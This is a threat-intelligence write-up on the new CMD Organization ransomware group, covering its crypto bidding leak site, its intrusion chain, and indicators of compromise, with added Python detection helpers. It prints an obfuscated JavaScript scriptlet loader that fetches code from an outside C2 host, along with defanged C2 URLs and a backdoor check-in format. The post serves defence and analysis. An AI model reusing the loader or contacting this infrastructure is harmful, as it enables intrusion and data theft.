- May 14, 2026
CMD Organization – New Ransomware Operator Moves to Place Public Bidding Wars on Ransomed Data
In April, Beazley Security’s incident response team was called in after a newly surfaced affiliate calling themselves CMD Organization deployed ransomware and exfiltrated data from a victim organization. By adding a bidding platform to its leak site, the group lets potential buyers take part directly in the extortion process. In this post, we document what our responders uncovered about CMD Organization and explore their leak site.
Executive Summary
Recently, Beazley Security’s incident response team was called in after a newly surfaced threat actor group calling themselves CMD Organization deployed ransomware and exfiltrated data from a victim organization. This engagement represents one of the earliest confirmed intrusions attributed to the group, only weeks after their public emergence in late March.
What distinguishes CMD Organization from other ransomware operators is what they’re attempting to do with the stolen data. By adding a bidding platform within its leak site, the group allows potential buyers to participate directly in the extortion process alongside victim negotiations.
While the group demonstrated the ability to execute end-to-end ransomware operations, the incident we observed reveals limited ransomware locker functionality, a likely dependence on outsourced tooling, and a leak site deployed so quickly that it exposed the attacker’s original hosting infrastructure.
Key Findings
CMD Organization is a new ransomware actor with confirmed activity beginning in late March 2026.
CMD Organization has introduced a crypto bidding concept on its leak site, expanding monetization opportunity while amplifying victim pressure through public pricing and bids.
Observed tradecraft suggests a potentially well-networked operator with limited operational maturity, possibly relying on initial access brokers (IABs) and little original tooling.
CMD Organization Background
CMD Organization is an emerging ransomware group that first posted victims to their public leak site in early April 2026. CMD Organization’s operating model appears similar to other ransomware operators, leveraging double extortion by both encrypting and exfiltrating data to ransom for profit. In the investigation our responders handled, several weeks of dwell time were observed between initial access and ransomware deployment. While it cannot be confirmed, the gap is consistent with groups that buy access from IABs rather than gaining access on their own.
Additional review of tradecraft and capability indicates the group may be operating with purchased or outsourced tooling. The ransomware locker exhibits a limited feature set when compared to binaries from other groups. CMD’s locker lacks built-in propagation capability and performance options seen within more mature examples from other groups. Although able to effectively execute their attack, we assess the group as less mature in operations and more dependent on outsourced access methods and tooling.
The subtle practice of using commas for monetary fractions within their bidding panel suggests the platform may be developed outside of Western influence. At the time of writing, the group has posted five victims on their leak site.
CMD Organization Leak Site and Bidding Platform
The earliest signs of CMD Organization infrastructure surfaced in late March. Beazley Security Labs identified a TLS certificate for cmdofficial[.]com logged on March 29th, 2026, and DNS records for the clearnet site were registered through Namecheap the same day, aligning with the public launch of the group’s ransomware-as-a-service (RaaS) operation.

Figure 1: CMDOfficial Leaksite
Less conventionally, we observed that CMD Organization integrates a crypto bidding platform directly into its public leak site, attempting to convert stolen data into an auctionable asset before the information is leaked to other threat actors for free. The group’s auction-based extortion model expands monetization opportunities by reducing dependence on negotiations with the victim, while simultaneously increasing pressure on the victim as bids are placed on their data.
If CMD Organization can shift part of the traditional ransom and extortion process away from private negotiations toward public bidding, selling exclusive access to stolen data could raise the price in line with buyer demand. Locking the sale to a single buyer would give the winner exclusive access to the stolen data, with time to sift through and operationalize credentials, identities, customer records, or other sensitive information before it circulates to competing threat actors.
Higher-tier criminal forums marketing illicit data today gate access through paywalls or reputation checks, constraining the buyer pool. With public access and open data samples, anyone with a browser and bitcoin wallet can theoretically participate. Potential buyers can access the “CMDOfficial” leak site through clearnet or their anonymized Tor site to review data and place bids, documented in the IoCs section of this post.

Figure 2: CMDOfficial Leaksite Bid Form
We couldn’t help but test the bidding panel and were able to enter a desired amount of crypto. On submission, the site returned a message that our bid had been placed successfully and that a seller would be in contact. Interestingly, we were not required to enter any wallet information or provide a small verification deposit, a telling sign that the functionality is in beta or conceptual phases. As of writing, we have not received a response from CMD operators.
Once the bidding period ends, the leak site admins appear to make the data publicly downloadable if no successful bid was made.
Leak Site Hosting
Panel infrastructure for the group was provisioned in late March, with DNS records updated again on March 31st, likely to move the site behind Cloudflare, in an attempt to obscure the underlying host and preserve availability.

Figure 3: CMDOfficial DNS Records
At the time of investigation, the clearnet leak site was proxied behind Cloudflare, with historical DNS data linking earlier resolution of the site to the IP address 209.99.186[.]211. CMD Organization also maintains a Tor (.onion) leak site, listed in our IoCs section, that mirrors the clearnet content. Behind Cloudflare, the site appears to run on an Ubuntu build and is served through an nginx proxy.

Figure 4: CMDOfficial Shodan Record (5/7/2026)
Incident Overview
Beazley Security Incident Response observed CMD Organization ransomware in a recent investigation, where our responders documented the group’s operational tradecraft and ambitions firsthand. Below, we dive into the initial access vector, lateral movement, persistence, related tooling and malware, and the CMD-branded ransomware locker.
The following attack chain depicts either direct CMD Organization activity or an affiliate operating with the same ransomware locker:

Figure 5: Attack Chain
Initial Access and Dwell Time
Initial access was achieved through an SEO-poisoned lure within Bing’s search ecosystem, tricking the victim into downloading a ZIP archive posing as a PDF. The archive contained a malicious, encoded JavaScript loader that, once unpacked, resembles the following:
GetObject("\u0073c\u0072i\u0070\u0074le\u0074:h\u0074\u0074\u0070://0\u0078a763e94e/m\u0062d");/*!\u98ac\xed-\x46\u7e18\x77-\u1d42 X-\x0a\x1e\u324e*/
Deobfuscated - GetObject("scriptlet:hxxp://167.99.233[.]78/mbd");
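To turn a loader like the one above into something detection tooling can match, an analyst wants the decoded, normalized URL rather than the raw escaped string. The Python below is an added example, not tooling from the incident or from the threat actor: it resolves the \u and \x escapes, extracts the scriptlet: target, and converts the hex-encoded host (0xa763e94e) into dotted-quad form. The sample input is a constructed copy of the snippet above; handling of plain-decimal integer hosts is an assumption beyond what the page shows.

```python
import ipaddress
import re

# Constructed sample: the escaped loader string from the write-up above
SAMPLE = (r'GetObject("\u0073c\u0072i\u0070\u0074le\u0074:h\u0074\u0074\u0070://'
          r'0\u0078a763e94e/m\u0062d");/*!\u98ac\xed-\x46\u7e18\x77-\u1d42 X-\x0a\x1e\u324e*/')

def decode_js_escapes(text: str) -> str:
    # Resolve \uXXXX and \xXX string escapes the way a JScript engine would
    text = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)

def normalize_host(host: str) -> str:
    # Map hex (0xa763e94e) or plain-decimal integer hosts, which URL parsers accept,
    # to dotted-quad so the indicator matches blocklists. Other hosts are returned as-is.
    h = host.lower()
    try:
        if h.startswith("0x"):
            return str(ipaddress.IPv4Address(int(h, 16)))
        if h.isdigit():
            return str(ipaddress.IPv4Address(int(h)))
    except ValueError:
        pass  # out of IPv4 range; leave untouched
    return host

SCRIPTLET = re.compile(r'scriptlet:(https?)://([^/"\s:]+)(:\d+)?([^"\s]*)', re.I)

def extract_scriptlet_urls(js: str) -> list[str]:
    # Return normalized scriptlet: URLs referenced by a (possibly escaped) JS loader
    urls = []
    for scheme, host, port, path in SCRIPTLET.findall(decode_js_escapes(js)):
        urls.append(f"{scheme.lower()}://{normalize_host(host)}{port}{path}")
    return urls

def defang(url: str) -> str:
    # hxxp://167.99.233[.]78/path form (last dot bracketed) for safe sharing in reports
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    host = "[.]".join(host.rsplit(".", 1))
    return f"hxxp{scheme[4:]}://{host}{sep}{path}"

if __name__ == "__main__":
    for u in extract_scriptlet_urls(SAMPLE):
        print(defang(u))
```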
This JavaScript loader, executed via the Windows utility cscript.exe, immediately runs a complex, obfuscated PowerShell payload. The PowerShell malware ships with anti-analysis functionality and frequently connects back to the 167.99.233[.]78 Command and Control (C2) server to fetch further code. After several check-ins, it unpacks the following C2 URL string into memory:
hxxp://213.165.47[.]49/b0c9ed38f2b14c119546.php
Multiple security vendors have flagged this URL and this method of loading into memory as a potential StealC indicator. Once it executed in the victim’s environment, little to no forensic evidence of further malicious activity appeared right away; responders in fact observed an unusually long dwell time of around 25 days before CMD Organization’s locker deployed encryption.
Long dwell times are a common indicator of an IAB at play: a separate actor compromises the environment, holds access, and then sells it to whoever deploys the final payload in an attempt to extort and monetize the victim. While we cannot confirm this, we assess that CMD Organization likely sourced their access from an IAB rather than establishing it independently.
Lateral Movement
The threat actor made use of Advanced IP Scanner, a network scanning utility we commonly see in ransomware engagements, for additional reconnaissance once inside the environment. After this initial mapping, Invoke-SMBRemoting was used with credentials harvested from the original victim’s account to perform remote command execution. This script is publicly available from a GitHub repo and can be used to create “fileless” interactive shells or execute commands remotely by loading into memory.
Backdoor Persistence
The threat actor deployed a backdoor DLL that our investigation flagged as the “Meow” backdoor. The name comes from the fact that the only significant function export in the DLL is named “Meow”:

Figure 6: DLL Backdoor Exports
Despite the proliferation of third-party malware products in threat actor toolkits, we found no prior reporting on a backdoor using the specific “Meow” export name. This does not imply that the backdoor is uncommon, however, as such strings often vary across individual threat actor deployments. What may be of more use to investigators is the malware’s C2 server hosted at 188.190.2[.]165:666. The malware sends the following check-in string via HTTPS:
{"IsAdmin":true,"Username":"<username>","Domain":"<domain>","OSVersion":"<os version>""PcName":"<pc name>"}
Persistence for this backdoor was achieved by staging PowerShell scripts as startup items in the victim’s HKEY_USERS Run registry keys. The values were deceptively named “Install Microsoft Teams” and each assigned an incrementing fake version number of the software:

Figure 7: Persistence in Run Key
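The persistence described above gives an analyst a concrete triage pattern: Run values under HKEY_USERS whose name mimics a Teams installer, that launch PowerShell with hidden-window or policy-bypass flags, and that exist in several near-identical versioned copies. The Python below is an added example, not tooling from the investigation; the registry content is constructed for illustration (only the “Install Microsoft Teams <version>” naming follows the post, the SID and script paths are placeholders), and the function expects the {key_path: {value_name: command}} shape an analyst can build from winreg, a reg export, or a forensic registry parser.

```python
import re

# Constructed registry content for illustration. Only the "Install Microsoft Teams <version>"
# naming pattern comes from the incident; the SID, script names and paths are placeholders.
SAMPLE_RUN_VALUES = {
    r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run": {
        "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
        "Install Microsoft Teams 1.6.00.4472":
            r"powershell.exe -w hidden -ep bypass -f C:\Users\user\AppData\Roaming\update.ps1",
        "Install Microsoft Teams 1.6.00.4473":
            r"powershell -nop -w hidden -File C:\Users\Public\teams_update.ps1",
    },
}

# Run-key value names that read like an installer action are unusual; installers do not
# re-run at every logon, and a Teams autostart entry does not carry this name.
TEAMS_NAME = re.compile(r"^\s*install microsoft teams(?:\s+[\d.]+)?\s*$", re.I)
PS_LAUNCH = re.compile(r"""(?:^|[\\\s"'])(?:powershell|pwsh)(?:\.exe)?\b|\.ps1\b""", re.I)
HIDDEN_FLAGS = re.compile(
    r"-(?:w|windowstyle)\s+hidden|-(?:ep|executionpolicy)\s+bypass|-nop\b|-noprofile\b"
    r"|-e(?:nc|ncodedcommand)?\b", re.I)

def triage_run_values(run_values: dict) -> list[dict]:
    # Flag Run values matching the observed persistence pattern; one finding per value,
    # each with the list of reasons so an analyst can see why it was raised
    findings = []
    for key, values in run_values.items():
        teams_like = [n for n in values if TEAMS_NAME.match(n)]
        for name, cmd in values.items():
            reasons = []
            if name in teams_like:
                reasons.append("value name impersonates a Teams installer")
                if len(teams_like) > 1:
                    reasons.append(f"one of {len(teams_like)} copies differing only by version number")
            if PS_LAUNCH.search(cmd):
                reasons.append("launches PowerShell or a .ps1 script at logon")
            if HIDDEN_FLAGS.search(cmd):
                reasons.append("hidden window or execution-policy bypass flags")
            if reasons:
                findings.append({"key": key, "name": name, "command": cmd, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in triage_run_values(SAMPLE_RUN_VALUES):
        print(f["name"], "->", "; ".join(f["reasons"]))
```

On a live Windows host the same dictionary can be filled by enumerating each SID under HKEY_USERS with winreg and reading its CurrentVersion\Run values, so loaded user hives are covered rather than only HKCU.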
Data Exfiltration
Although data exfiltration was confirmed by the threat actor in this case, evidence of the tooling and the exfiltration destination was destroyed and could not be recovered during this investigation.
Encryption
The CMD locker binary was propagated through the victim network via GPO and SYSVOL. In this case, the threat actor used the filename “paste1.exe”.
Initial analysis of the CMD locker binary itself is straightforward. Like many other ransomware families, it uses a combination of ChaCha20 and RSA with an embedded public key when encrypting files; the corresponding private key would be needed to decrypt and attempt recovery of the affected data.
The locker has functionality to perform both full and partial file encryption, though in this case only full encryption appears to have been used. On execution, it drops an HTML ransom note and opens it in Chrome once the encryption process finishes:

Figure 8: CMD Ransom Note
Unlike other new ransomware variants like Vect, the observed CMD Organization locker does not appear to provide additional features outside of encryption functionality, such as built-in lateral movement or other performance enhancements for deployment.
We are continuing to analyze the locker and will provide an in-depth update once completed.
Indicators of Compromise (IoCs)
Infrastructure
| Indicator | Description |
| --- | --- |
| cmdofficial[.]com | CMD Organization clearnet leak site |
| 209.99.186[.]211 | Leak site hosting IP (as of 5/7/2026) |
| AS402253 | Leak site hosting ASN |
| cmdnkiqjije2tllr3biee2sjgj3i4robg2cbtilbnytdhh2wy3syrlyd[.]onion | CMD Organization Tor leak site |
Contacts
| Indicator | Description |
| --- | --- |
| cmd2official@onionmail[.]org | CMD Organization email |
| Cmdhtmnjksgkuhilrtrh@onionmail[.]org | CMD Organization email |
| MitsueWhite@onionmail[.]org | CMD Organization email |
| JedAdams@onionmail[.]org | CMD Organization email |
Network
| Indicator | Description |
| --- | --- |
| 188.190.2[.]165[:]666 | Meow backdoor C2 |
| 213.165.47[.]49 | Infostealer infrastructure |
| 167.99.233[.]78 | Infostealer infrastructure |
URLs
| Indicator | Description |
| --- | --- |
| hxxps://clubsoar[.]com/fd/patricia%20va%20a%20california%20pdf.zip | Malvertisement payload delivery |
| hxxps://artistichairlounge[.]com/bestbooklibrarycom/template.php?q=patricia%20va%20a%20california%20pdf | Malvertisement payload delivery |
| hxxp://213.165.47[.]49/b0c9ed38f2b14c119546.php | Infostealer infrastructure |
| hxxp://167.99.233[.]78/mbd | Infostealer infrastructure |
Files & Tools
| File | Hash | Description |
| --- | --- | --- |
| paste1.exe | 07c14b82f673ba5caa8c1188f052ea31583f0af7 | CMD locker |
| Patricia-va-a-california-pdf.zip | 69aa0eeab454e6967e9c860d02749857b0b4c4ea8c55ba0c1a1af12af5a25bca | Malvertisement payload binary |
| qlgdhgk.ps1 | 8ed2c2e67ae8d3cfe1fca15d5c7b33e7011bb8dd | Infostealer PowerShell |
| qu.ps1 | c18cef4610d272caa3c51ec5803439aff3b4982e | Infostealer PowerShell |
| Netdrv.dll | 463554c76a0aa472daf9b42e9414942910b4ac54 | Meow backdoor |
| Advanced_Port_Scanner_2.5.3869.exe | | Network reconnaissance tool |
| Invoke-SMBRemoting | | Abused for lateral movement and execution |
| Openssl.exe | | Abused for proxy tunnel |
| __README__.html | | CMD Organization ransom note |